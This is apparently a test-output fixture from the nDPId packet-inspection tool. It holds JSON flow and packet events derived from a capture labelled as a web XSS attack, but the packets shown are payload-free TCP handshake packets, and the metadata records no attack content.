+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348081118,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348082422,"flow_last_seen":1499348082422,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348082422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1499348082422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348082422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EzVAAD4GspusEAABwKgKMovAAFDEhDu+AAAAAKACchCo6AAAAgQFtAQCCAoBPSiLAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":2,"flow_last_seen":1499348082422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348082422,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi8Dw+8kBxIQ7v6AScSDx4wAAAgQFtAQCCAoD5vn\/AT0oiwEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":3,"flow_last_seen":1499348082423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348082423,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EzZAAD4GsqKsEAABwKgKMovAAFDEhDu\/8PvJAoAQAOWQ6wAAAQEICgE9KIsD5vn\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9246,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348083715,"flow_last_seen":1499348083715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348083715,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9246,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1499348083715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348083715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aIdAAD4GXUmsEAABwKgKMovOAFCsxEFJAAAAAKACchC5zAAAAgQFtAQCCAoBPSnOAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":2,"flow_last_seen":1499348083716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348083716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi847RWyhrMRBSqAScSATnAAAAgQFtAQCCAoD5vtCAT0pzgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":3,"flow_last_seen":1499348083716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348083716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aIhAAD4GXVCsEAABwKgKMovOAFCsxEFKO0VsooAQAOWyowAAAQEICgE9Kc4D5vtC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348086300,"flow_last_seen":1499348086300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348086300,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1499348086300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348086300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GytAAD4GqqWsEAABwKgKMovoAFCxvjd\/AAAAAKACchC7\/AAAAgQFtAQCCAoBPSxUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":2,"flow_last_seen":1499348086300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348086300,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi+jtWBzhsb43gKAScSCw8gAAAgQFtAQCCAoD5v3IAT0sVAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":3,"flow_last_seen":1499348086301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348086301,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GyxAAD4GqqysEAABwKgKMovoAFCxvjeA7Vgc4oAQAOVP+gAAAQEICgE9LFQD5v3I"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348087568,"flow_last_seen":1499348087568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348087568,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1499348087568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348087568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WltAAD4Ga3WsEAABwKgKMov2AFAj3nfKAAAAAKACchAIRwAAAgQFtAQCCAoBPS2RAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":2,"flow_last_seen":1499348087568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348087568,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi\/boFFliI953y6AScSDEwgAAAgQFtAQCCAoD5v8FAT0tkQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":3,"flow_last_seen":1499348087569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348087569,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WlxAAD4Ga3ysEAABwKgKMov2AFAj3nfL6BRZY4AQAOVjygAAAQEICgE9LZED5v8F"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348090129,"flow_last_seen":1499348090129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348090129,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1499348090129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348090129,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nGpAAD4GKWasEAABwKgKMowQAFDWkax4AAAAAKACchAeSgAAAgQFtAQCCAoBPTASAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":2,"flow_last_seen":1499348090129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348090129,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjBAuWbjG1pGseaAScSAynQAAAgQFtAQCCAoD5wGFAT0wEgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":3,"flow_last_seen":1499348090130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348090130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nGtAAD4GKW2sEAABwKgKMowQAFDWkax5Llm4x4AQAOXRpAAAAQEICgE9MBID5wGF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348091413,"flow_last_seen":1499348091413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091413,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9306,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1499348091413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348091413,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nrdAAD4GJxmsEAABwKgKMoweAFAj3q\/lAAAAAKACchDMQQAAAgQFtAQCCAoBPTFTAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":2,"flow_last_seen":1499348091413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348091413,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjB4dm6koI96v5qAScSD\/rwAAAgQFtAQCCAoD5wLGAT0xUwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":3,"flow_last_seen":1499348091414,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348091414,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nrhAAD4GJyCsEAABwKgKMoweAFAj3q\/mHZupKYAQAOWetwAAAQEICgE9MVMD5wLG"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347957282,"flow_last_seen":1499347962887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347958588,"flow_last_seen":1499347963888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347961167,"flow_last_seen":1499347966888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347962480,"flow_last_seen":1499347967888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347963774,"flow_last_seen":1499347968888,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347965133,"flow_last_seen":1499347970889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9315,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347966420,"flow_last_seen":1499347971889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348091923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348092675,"flow_last_seen":1499348092675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348092675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1499348092675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348092675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WzpAAD4GapasEAABwKgKMowsAFACaGm0AAAAAKACchAyoAAAAgQFtAQCCAoBPTKOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":2,"flow_last_seen":1499348092675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348092675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjCznHw5PAmhptaAScSA2JwAAAgQFtAQCCAoD5wQCAT0yjgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":3,"flow_last_seen":1499348092676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348092676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WztAAD4Gap2sEAABwKgKMowsAFACaGm15x8OUIAQAOXVLgAAAQEICgE9Mo4D5wQC"} 
